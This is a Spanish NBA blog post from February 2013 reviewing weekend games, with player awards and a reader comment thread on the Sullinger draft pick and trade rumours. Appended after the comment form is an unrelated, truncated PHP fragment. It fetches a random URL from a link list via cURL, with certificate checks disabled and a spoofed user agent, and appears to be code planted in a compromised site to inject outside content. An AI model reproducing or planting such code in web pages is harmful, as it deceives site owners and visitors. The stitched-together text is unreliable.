Informe del fin de semana: los deberes pendientes

03 de February de 2013 por MagicJohnson32

El fin de semana que repasaremos en estas líneas ha sido el primero de febrero, cosa que significa que se juega la Super Bowl y en los Estados Unidos sólo se habla de football. La NBA no se ha decidido este fin de semana, pero la llegada de febrero implica que ya estamos en la segunda mitad de la temporada y las victorias y derrotas empiezan a valer un poco más, especialmente para los equipos que no hicieron los deberes en los primeros meses de competición. Lakers, Celtics y Knicks fueron los únicos que sacaron un 2-0, y con ellos empezamos el resumen.

Los Lakers, obviamente con muchos deberes pendientes, miran hacia arriba con cinco victorias en seis encuentros, incluyendo las dos obtenidas este fin de semana. Como ya pasara en la victoria frente a los Hornets y la derrota en Phoenix, los Lakers mostraron dos caras muy diferentes tanto en Minnesota como en Detroit. En ambos casos arrancaron con mucho acierto, más tarde desperdiciaron rentas amplias, sufrieron (sobre todo en el agónico triunfo sobre los Pistons) y finalmente acabaron imponiéndose, y eso es todo lo que importa ahora mismo en La-La Land. Dwight Howard, sobre quien planea la sombra del quirófano, sigue de baja y Pau no está desaprovechando la ocasión de reivindicarse: 45 puntos y 22 rebotes para el de Sant Boi en estos dos partidos.

boston celticsPasan los días, y los Celtics-sans-Rondo siguen ganando. Lo hicieron el viernes contra Orlando Magic y repitieron anoche ante unos Clippers que padecen lo indecible sin Chris Paul y que ya venían de caer estrepitosamente el viernes en Toronto (en lo que supuso el debut de Rudy Gay para los Raptors). Aun así, Boston necesitó una magnífica acción defensiva de Avery Bradley, forzando la falta de ataque de Crawford, para desactivar la embestida de los Clippers, que perdían por 19 al descanso y por 15 al inicio del último cuarto y que estuvieron a un paso de la victoria. Eric Bledsoe es un recambio extraordinario pero no es CP3 y los Clippers echan especialmente de menos a su líder en los finales de partido. Por los Celtics, Paul Pierce ha retomado los galones, lo cual es garantía de que venderán cara su plaza de Playoffs. Por cierto, un rumor habla de un posible traspaso que enviaría a Garnett a los Clippers a cambio de Bledsoe y Butler.

Los Knicks, con dos victorias este fin de semana y una racha de cuatro consecutivas, vuelven a presentar sus credenciales como candidato al título del Este, o al menos como favorito en la Atlantic. El viernes tuvieron que remontar para superar a los Bucks y el sábado aplastaron a los Kings, siempre con la aportación sólida de Amaré desde el banco y Chandler inconmensurable bajo los aros (20 rebotes en cada uno de los dos partidos). No pierde pie su rival y vecino, unos Nets que sufrieron pero acabaron venciendo a los Bulls gracias a Blatche y Brooks, autores de 20 puntos en el último periodo. Los de Chicago jugaban sin Noah ni Boozer, y aun así fueron capaces de plantar cara en Brooklyn y de vencer la noche siguiente en Atlanta. La derrota de los Hawks la aprovecharon los Bucks, que se recuperaron traer caer en el MSG y ganaron a los Magic para acercarse a un solo partido de la sexta plaza del Este.

LeBron y GeorgeUno de los equipos que sale más fortalecido son los Pacers, que volvieron a tumbar a los Heat liderados por un David West casi infalible (30 puntos con 12 de 15 en FG, 7 rebotes y 5 asistencias) y la ya habitual consistencia defensiva que los hace tan competitivos, especialmente en su pabellón. Los campeones siguen con sus problemas como visitante y ante los mejores de su conferencia, pero se mantienen al frente del Este tras ganar anoche en Toronto con una actuación inapelable del Big Three. Este resultado asegura a Spoelstra el banquillo del equipo del Este en el All-Star Game.

El líder del Oeste y equipo con mejor balance de la NBA, los Spurs, ampliaron a 10 su racha de victorias con un triunfo sobre los Wizards en el que, sin embargo, cayó lesionado Tim Duncan. Aunque probablemente le costará algunos partidos de baja, no parece serio y no existe motivo de preocupación en el Álamo, especialmente con Tony Parker (elegido Jugador de Enero en la Conferencia Oeste) a los mandos de la nave.

También ganaron su único partido del fin de semana los tres equipos que se disputan la cuarta posición del Oeste. Los Grizzlies vencieron a los Wizards en un partido gris pero con un debut notable por parte de Taysh Prince, los Nuggets cumplieron en la visita de los Hornets con buenos partidos de Iguodala, Gallinari y Lawson, y el sábado los Warriors recurrieron a una espectacular segunda mitad para ganar a los Suns. Stephen Curry volvió tras dos encuentros de baja y brilló al frente de un quinteto que rindió a un nivel altísimo.

También se presenta reñida la lucha por las dos últimas posiciones que dan acceso a los Playoffs de la Western. Jazz y Blazers acabaron en tablas, con victorias locales como era de prever, su doble duelo. Por destacar algo, el partido en Portland fue mucho más entretenido que el disputado la noche anterior en Salt Lake City y Lillard sigue consolidando su estatus como incuestionable mejor novato del año. Los Mavs vencieron a los Suns de nuevo sin Nowitzki y remontando en el último cuarto con un esfuerzo colectivo que hizo inútil la actuación de Dragic.

Kyrie

De igual manera respondieron los Rockets, que no lo tuvieron fácil para ganar a los Bobcats pero contaron con el primer triple doble en la carrera de James Harden además de excelentes contribuciones de Chandler Parsons, Patterson y Asik, demasiado para Kemba & Co. Los Wolves, por su parte, no se resignan y tras la derrota del viernes frente a Lakers, arrasaron el sábado a los Hornets en un partido en el que Ricky Rubio protagonizó las acciones más espectaculares.

Entre las actuaciones individuales que nos maravillaron, no nos queda más que rendirnos ante Kyrie Irving y su portentosa demostración como ‘closer’ el sábado ante los OKC Thunder. Los Cavs habían encajado una dolorosa paliza en Detroit la noche anterior e Irving se había disculpado por su falta de intensidad en la derrota. Frente a los últimos finalistas de la NBA, el vigente ROY metió 35 puntos, 13 de los cuales llegaron en los últimos tres minutos, sin un solo fallo en el tiro y siempre con una diferencia de menos de tres puntos en el marcador. Los 60 puntos anotados entre Durant y Westbrook no sirvieron por culpa de Irving, pero también de Speights, excelente como sexto hombre.

PREMIOS

MVP: Ante la ausencia de Dwight Howard, Pau Gasol está saliendo de pívot de titular y se está reivindicando ante sus compañeros, su entrenador y toda la liga. 2 partidos, 2 victorias y 22’5 puntos y 11 rebotes de media. David West (30 puntos, 7 rebotes y 5 asistencias el viernes frente los Heat), James Harden (21-11-11, el sábado frente los Bobcats) y Stephen Curry (29 puntos y 8 asistencias el sábado frente los Suns) también lideraron a los suyos en las victorias de sus equipos.

Rookie: Posiblemente Andre Drummond esté resultando una de las mayores sorpresas del draft de este año. Anoche estuvo a un punto de dar la victoria a su equipo en el último segundo y protagonizó acciones espectaculares. Acabó el partido con 9 puntos, 11 reboets y 4 tapones. De todas maneras el mejor del fin de semana ha sido de nuevo Damian Lillard, con 24’5 puntos y 6’5 asistencias de media en los 2 partidos jugadores. Kyle Singler (20 puntos, 8 rebotes, 3 tapones y 2 robos, el viernes ante los Cavs), Moe Harkless (19 puntos, 14 rebotes y 4 robos el sábado ante los Bucks) han sido otros de los destacados.

Sorpresa: En un equipo de tanto glamour sorprende ver como Earl Clark sigue saliendo de titular, disfrutando de minutos y, lo más importante, respondiendo con creces. En ambos partidos del fin de semana ha conseguido un doble-doble. En ausencia de Carlos Boozer, Taj Gibson también está aprovechando la oportunidad: 16 puntos y 9 rebotes el viernes y 19 puntos y 19 rebotes el sábado.

Esfuerzo en vano: Los Magic perdieron sus 2 partidos a pesar de que Nikola Vucevic hizo todo lo que está en su mano para evitarlo. El montenegrino se ha convertido en uno de los jugadores más regulares de la liga y este fin de semana no ha sido una excepción. 14 puntos y 14 rebotes el viernes y 20 puntos y 12 rebotes el sábado.

Comenta

29 comentarios a esta entrada

  1. Cultura NBA dice:
    #1

    Increíble lo de Irving. Va camino del estrellato.

      Citar

  2. nba dice:
    #2

    Siempre que las lesiones le respeten …

      Citar

  3. GreenPride dice:
    #3

    A veces pasan cosas incomprensibles en esta NBA. Los Celtics han perdido para el resto del año a Rondo y Sullinger, dos jugadores jóvenes uno de ellos su máxima estrella y sin embargo han encadenado 4 victorias seguidas…. Ayer tarde Pierce se echó el equipo a la espalda y todos rayaron a buena altura. Buenas contribuciones de Green y Terry (por fin), el trabajo de siempre de Garnett y la defensa de Lee y Bradley hicieron que los de Boston gozaran de clarísimas ventajas durante el segundo y tercer cuarto. En el último se atascaron una vez más y los Clippers casi logran la remotada. Sin Rondo los verdes no son mejores eso está claro pero hay una serie de jugadores que han decidido tomar más responsabilidades en vez de esperar a que el base les diera el balón para lanzar y a ratos el juego mejora ya que todos participan más. A la larga, sobre todo en PO si es que llegan los Celtics, se notará mucho la baja de Rondo pero ahora mismo todos están tirando de casta para intentar hacer ver que la temporada no está acabada, incluso con el mar de rumores de traspaso que rodea al equipo.
    Por los de LA, la vida sin CP3 se está haciendo la mar de difícil. Si con él peleaban el mejor record de la liga, ahora ya son terceros en el Oeste y seriamente amenazados por Memphis, Golden State o Denver en una lucha que promete ser interesantísima de aquí al final de la regular. Bledsoe cumple de sobra pero no hace que el juego fluya como lo hace Paul y el resto parecen todos fuera de aquella forma que les llevó a ser el terror de la liga… veremos si espabilan rápido y si CP3 vuelve pronto.
    Del resto los Lakers siguen para arriba ganando a rivales menores pero al menos ganando. Pau vuelve a rendir ahora que ha recuperado su sitio en la pintura aunque siguen a 4 partidos de PO. Kobe parece que ha dejado de tirarlas todas para ver si así consiguen sacar esto adelante y ahora tienen otra dura prueba. A partir de mañana y para acabar gira en 6 días tienen partidos en Brooklyn, Boston, Charlotte y Miami. Tres huesos a domicilio y cansados por el viaje y de vuelta a casa Phoenix, Clippers y Boston otra vez. En total siete partidos importantísimos para ellos, a ver que tal les va.
    Y mientras todo esto pasa y OKC y Miami van perdiendo partidos de vez en cuando los Spurs ya llevan 10 victorias consecutivas y se van afianzando como mejor record de la liga… una vez más

      Citar

  4. Esteban dice:
    #4

    lo de sullinger QUE SE JODAN, se aviso antes del draft de sus problemas de espaldas y por eso bajo tanto en el draft, los celtics corrieron el riesgo y bue, sucedio

    menphis empiexza a jugar sin gay, muuuucho cuidado, cuando se acostumbren, quien dice que vuelvan a ser peligrosos

    por ultimo, en este sitio, sera por que distutia el ROY con rubio, pero siempre se dudo mucho de IRVING y se lo critico duramente, hoy creo que nadie volveria a hablar mal de el

      Citar

  5. Cultura NBA dice:
    #5

    Lo de Sullinger es una lástima. Aún tiene carrera por delante, es cierto. Boston eligió a un muy buen jugador en una posición retrasada y el riesgo estaba muy claro. ¿Merecía la pena correr ese riesgo?

      Citar

  6. Esteban dice:
    #6

    Cultura NBA:
    Lo de Sullinger es una lástima. Aún tiene carrera por delante, es cierto. Boston eligió a un muy buen jugador en una posición retrasada y el riesgo estaba muy claro. ¿Merecía la pena correr ese riesgo?

    yo creo que si, de hecho, jugo media temporada entrando efectivamente en la rotacion como si fuera un veterano, si no se lesionaba iba a terminar redondeando una muy buena campaña, no es facil encontrar jugadores asi e el puesto 20 del draft y mucho menos que rindan desde el dia uno

    una pena, pero creo que no tendra una carrera muy fructifera, al contrario, la lesion esta confirma lo grave de su problema y cuando razon tenian los medicos, una pena por el,

      Citar

  7. Simon dice:
    #7

    Cultura NBA:
    Lo de Sullinger es una lástima. Aún tiene carrera por delante, es cierto. Boston eligió a un muy buen jugador en una posición retrasada y el riesgo estaba muy claro. ¿Merecía la pena correr ese riesgo?

    total y rotundamente SI. Que iban a pillar valioso en el 21?? muy poco… para mi merecía la pena y lo sigue mereciendo… si Sullinger, aunque mermado puede tener una carrera mas o menos buena en la NBA y Boston va a disfrutar de el seguro. Si no la tiene que mas da? cuantos jugadores elegidos por detras de Sullinger van a tner mejores carreras que Sullinger?? muy pocos por detrás de el.

      Citar

  8. Esteban dice:
    #8

    Simon: total y rotundamente SI. Que iban a pillar valioso en el 21?? muy poco… para mi merecía la pena y lo sigue mereciendo… si Sullinger, aunque mermado puede tener una carrera mas o menos buena en la NBA y Boston va a disfrutar de el seguro. Si no la tiene que mas da? cuantos jugadores elegidos por detras de Sullinger van a tner mejores carreras que Sullinger?? muy pocos por detrás de el.

    jugadores que boston podria haber elegido en luga de sullinger con menos propension a las lesiones y quiza mejores que el:

    John Jenkins
    Tony Wroten
    Marquis Teague
    Perry Jones (mmmm no estoy seguro, pero potencial tiene)

    segunda ronda

    Jae Crowder
    Jeffery Taylor
    Doron Lamb
    orlano jhonson y draymond green

      Citar

  9. txusma dice:
    #9

    No, ninguno de estos es mejor que Sullinger ni de lejos. De hecho, un Sullinger sano habría sido TOP-10 del draft seguro.

      Citar

  10. GreenPride dice:
    #10

    Respecto a Sullinger y se merecía la pena cogerlo, por supuesto que sí. Los jugadores que nombras Esteban son regulares en su mejor versión y Sullinger está claramente por encima. Boston sabía que jugaba con fuego pero el riesgo no sólo merecía la pena entonces sino que sigue mereciéndola ahora incluso lesionado. Esperemos que llegue a recuperarse y jugar sin problemas pero no creo que ningún jugador que hubieran elegido los de Boston a esas alturas del draft les hubiera valido más la pena que él.

      Citar

  11. Esteban dice:
    #11

    claro que sullinger es mejor que los hombres que mencione, pero a la calidad y el potencial de sullinger hay que restarle la lesion cronica de su espalda, y el quiza final de su carrera si es tan grave como los medicos contaban pre-draft

    el potencial valia la pena, pero antes del draft no le daban una carrera mayor de 4 o 5 años, y eso me lo hace pensar

      Citar

  12. Simon dice:
    #12

    Esteban: jugadores que boston podria haber elegido en luga de sullinger con menos propension a las lesiones y quiza mejores que el:

    John Jenkins
    Tony Wroten
    Marquis Teague
    Perry Jones (mmmm no estoy seguro, pero potencial tiene)

    segunda ronda

    Jae Crowder
    Jeffery Taylor
    Doron Lamb
    orlano jhonson y draymond green

    Veamos por partes:
    – Jenkins: he tenido que ir a la página de la NBA para ver en que equipo jugaba… con eso lo digo todo. En diferentes web de scout le dan como un jugador que lo único que hace es lanzar de 3 muy bien, pero ni es un gran defensor ni nada mas… no lo compro.
    – Tony Wroten: Es verdad que es un chaval con muchas virtudes que en el futuro podría tornarse en un buen jugador pero sus virtudes y defectos son muy parecidos a los de Rondo, salvando las distancias claro…. ¿ para que gastar la ronda en un jugador de idénticas características a tu base que está considerado top 3 en bases de la competición?
    – Teague: es un jugador muy verde que nunca sabes que rendimiento puede dar en el futuro… pero repito, ya tenían a Rondo en esa posición.
    – Perry Jones: Otro jugador excesivamente verde. Tiene condiciones, pero me suena que ya ha tenido lesiones de rodilla y es de cabeza algo inestable, estas dos cosas son lo que lo hicieron bajar tanto en el draft.

    El resto no los comento pues ninguno me parece ni la mitad de jugador que Sullinger aun estando este tocado de la espalda. Luego alguno de este draft elegido detrás de el podrá ser la leche pero muy a largo plazo y encontrarlo es casi una casualidad asi que para mi la elección aun cayendo lesionado esta temporada sullinger me parecía acertadísima, pues estabas añadiendo a un jugador que estaba preparado para aportar desde el minuto uno a un equipo que necesitaba precisamente que el rookie de turno aportara desde el inicio pues en principio todos considerabamos a Boston un equipo aspirante al anillo.

      Citar

  13. Esteban dice:
    #13

    Simon: Veamos por partes:
    – Jenkins: he tenido que ir a la página de la NBA para ver en que equipo jugaba… con eso lo digo todo. En diferentes web de scout le dan como un jugador que lo único que hace es lanzar de 3 muy bien, pero ni es un gran defensor ni nada mas…no lo compro.
    – Tony Wroten: Es verdad que es un chaval con muchas virtudes que en el futuro podría tornarse en un buen jugador pero sus virtudes y defectos son muy parecidos a los de Rondo, salvando las distancias claro…. ¿ para que gastar la ronda en un jugador de idénticas características a tu base que está considerado top 3 en bases de la competición?
    – Teague: es un jugador muy verde que nunca sabes que rendimiento puede dar en el futuro… pero repito, ya tenían a Rondo en esa posición.
    – Perry Jones: Otro jugador excesivamente verde. Tiene condiciones, pero me suena que ya ha tenido lesiones de rodilla y es de cabeza algo inestable, estas dos cosas son lo que lo hicieron bajar tanto en el draft.

    El resto no los comento pues ninguno me parece ni la mitad de jugador que Sullinger aun estando este tocado de la espalda. Luego alguno de este draft elegido detrás de el podrá ser la leche pero muy a largo plazo y encontrarlo es casi una casualidad asi que para mi la elección aun cayendo lesionado esta temporada sullinger me parecía acertadísima, pues estabas añadiendo a un jugador que estaba preparado para aportar desde el minuto uno a un equipo que necesitaba precisamente que el rookie de turno aportara desde el inicio pues en principio todos considerabamos a Boston un equipo aspirante al anillo.

    ae Crowder y Jeffery Taylor han titularizado y jugado mas partidos y minuots que sullinger, por las dudas te comento

      Citar

  14. Simon dice:
    #14

    ya pero no me digas… Crowder medio medio… pero Jeffery Taylor en Bobcats y su nivel tampoco ha sido nada del otro jueves…

      Citar

  15. MagicJohnson32 dice:
    #15

    Hay que ver lo que os gusta discutir sobre rookies…

      Citar

  16. Denise dice:
    #16

    De los rookies y la elección de Sullinger bla bla bla….tambiñen falta Ezeli, el cual siempre da buenos minutos poniendo algun gorro e intimidando….quizás no será mejor jugador que Sullinger pero si mucho más que Fab Melo, el cual salió 8 picks antes.

      Citar

  17. safd dice:
    #17

    pues john jenkins lo poco q le dejo jugar larry drew lo hizo bastante bien, lo q pasa esq larry drew tiene confianza 0 con los rookies, consiguio q regalasemos a jordan crawford y a teague lo puso despues de q se lesionase hinrich, hasta entonces no tuvo oportunidad practicamente… ademas, no es solo un tirador como se comenta….para mi va a tener una buena carrera

      Citar

  18. Jose Luis dice:
    #18

    Venía a comentar que pese a los problemas que tenéis para seguir adelante cpn el blog, a ver si se publicaba una entrada con las predicciones de principio de temporada y como van hasta ahora esos pronósticos. Pero luego he pensado que estáis mal de tiempo y no corre prisa, que además os toca sacar un informe del mes de enero creo, y que esto de las predicciones de principio de temporada podéis hacerlo en el all-star que habrá días sin prisa.

    Muchas gracias por seguir con el blog adelante pese a las dificultades, de verdad, sois necesarios y queridos.

      Citar

  19. MagicJohnson32 dice:
    #19

    Jose Luis:
    Venía a comentar que pese a los problemas que tenéis para seguir adelante cpn el blog, a ver si se publicaba una entrada con las predicciones de principio de temporada y como van hasta ahora esos pronósticos. Pero luego he pensado que estáis mal de tiempo y no corre prisa, que además os toca sacar un informe del mes de enero creo, y que esto de las predicciones de principio de temporada podéis hacerlo en el all-star que habrá días sin prisa.

    Muchas gracias por seguir con el blog adelante pese a las dificultades, de verdad, sois necesarios y queridos.

    JL, el informe de enero lo publicó TheDeerHunter hace unos días. Te dejo el link: http://blog.tjnba.com/2013/01/27/informe-3-3/

    El repaso a los pronósticos lo solemos dejar para más adelante, seguro que caerá. Y gracias a ti 😉

      Citar

  20. Lucho dice:
    #20

    La pregunta sobre si valia la pena correr el riesgo por Sullinger, era valida si lo elegian 12-15.
    Al ser elegido 21, creo que no se sostiene. Es puro ventajismo

      Citar

  21. Denise dice:
    #21

    Jose Luis, te refieres a la entrada del Draft?

    http://blog.tjnba.com/2012/06/29/6798/

      Citar

  22. Denise dice:
    #22

    Jose Luis, te refieres a la entrada del Draft?

    http://blog.tjnba.com/2012/06/29/6798/

      Citar

  23. Jose Luis dice:
    #23

    Hay contactos entre Houston y Indiana por Granger… pero no veo ningún escolta ni base en los Rockets que pueda ayudar a los Pacers. Y creo que en Indiana quieren ver jugar juntos a George y Granger y ver si pueden dar un golpe en la mesa. Ya han ganado dos veces a Miami esta temporada, y son junto a Bulls y Knicks los candidatos a las finales. A los Nets y los Celtics les dejo fuera (aunque podrían llegar, pero les veo con menos posibilidades).

    ¿Alguien se aventura con especulaciones de traspaso?

      Citar

  24. Jose Luis dice:
    #24

    Gracias Magic, jolin si lo leí y todo… en fin, he pensado demasiadas cosas consecutivas…

    @Denise: no, me refiero a las entradas de análisis de cada equipo donde se decía el pronóstico de la temporada (play-offs, semifinales de conferencia, 25-30 victorias) y si no recuerdo mal el año pasado se hizo un artículo sobre la mitad de la temporada analizando si habían sido acertados o no los pronósticos 🙂

      Citar

  25. Esteban dice:
    #25

    Jose Luis:
    Hay contactos entre Houston y Indiana por Granger… pero no veo ningún escolta ni base en los Rockets que pueda ayudar a los Pacers. Y creo que en Indiana quieren ver jugar juntos a George y Granger y ver si pueden dar un golpe en la mesa. Ya han ganado dos veces a Miami esta temporada, y son junto a Bulls y Knicks los candidatos a las finales. A los Nets y los Celtics les dejo fuera (aunque podrían llegar, pero les veo con menos posibilidades).

    ¿Alguien se aventura con especulaciones de traspaso?

    claro, lo unico que pueden ofrecer los rockets que puede llegar a interesarle a los pacers es una exepcion de traspaso, tienen los rockets espacio, pero 13 millones que es el salario de granger? habria que revisar

    por otro lado, si se pudiera agregar a un escolta de otro equipo tendria mas sentido, pues esa es la carencia de los pacers, un tercer equipo…
    toronto esta algo interesado en liberar masa salarial, podrian en la mesa a derozan a cambio de una exepcion? o a terrence ROSS? ojala, pues como sabran soy de los pacers

      Citar

  26. Esteban dice:
    #26

    vuelven los rumores fuertes sobre gasol a toronto, por bargani…
    hay nada menos que 10 millones de diferencia entre salarios y los raptors no estan muy comodos salarialmente luego de asumir el contrato de gay, por lo que lo veo practicamente imposible

    una pena, pues pau ha mostrado en estos ultimos dos juegos que de titular y como la referencia interior que merecidamente debe ser, rinde y mucho

    un traspaso a un equiipo que lo valore como la estrella que es, puede significar la vuelta a la elite de pau

      Citar

  27. Esteban dice:
    #27

    Denise:
    De los rookies y la elección de Sullinger bla bla bla….tambiñen falta Ezeli, el cual siempre da buenos minutos poniendo algun gorro e intimidando….quizás no será mejor jugador que Sullinger pero si mucho más que Fab Melo, el cual salió 8 picks antes.

    lo de ezeli es puro oportunismo, la lesion de bogut lo puso de titular y a mi juicio no ha hecho nada de nada para justificar la titularidad, es grande, fuerte y se golpea con el que venga, es decir un cacho de carne, un ryan hollins o jason collins de la vida, sin dudas preferia correr el riesgo con sulliger que gastar una selecccion en el

    a ver, lo que planteo es que sullinger por potencial, todos sabemos que es una ganga en el puesto 21, incluso en el puesto 15 hacia atras es una ganga, pero esa ganga es muy engañosa, sus problemas de espalda no son nada nuevo y eso hizo que cayera tanto en el draft, quiza hasta se quede sin carrera luego de esta lesion, segun lo que hablaban los medicos
    entonces, por mas potencial que tenga, si la lesion era cronica y de la gravedad de la que todos hablaban, me parece demasiado arriesgado elegirlo en primera ronda,
    si potencial justificaba una eleccion, pero no tan alto, por como he dicho, ha habido jugadores mas utiles que lo que puede resultar el
    a mediados de la segunda ronda hubiese sido su lugar dado su fisico endeble

      Citar

  28. MagicJohnson32 dice:
    #28

    He leído por ahí “Robinson, jugador de la semana en la Conferencia Este”, y he estado dos minutos pensando hasta que he caído en que se refiere a Nate Robinson. WTF!?

      Citar

  29. Esteban dice:
    #29

    glen robinson? je nate robinson, quien te ha visto y quien te ve, pensar que no hace muchos dias pensaban en traspasarlo para ahorrarse unos dolares, y hoy es jugador de la semana

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>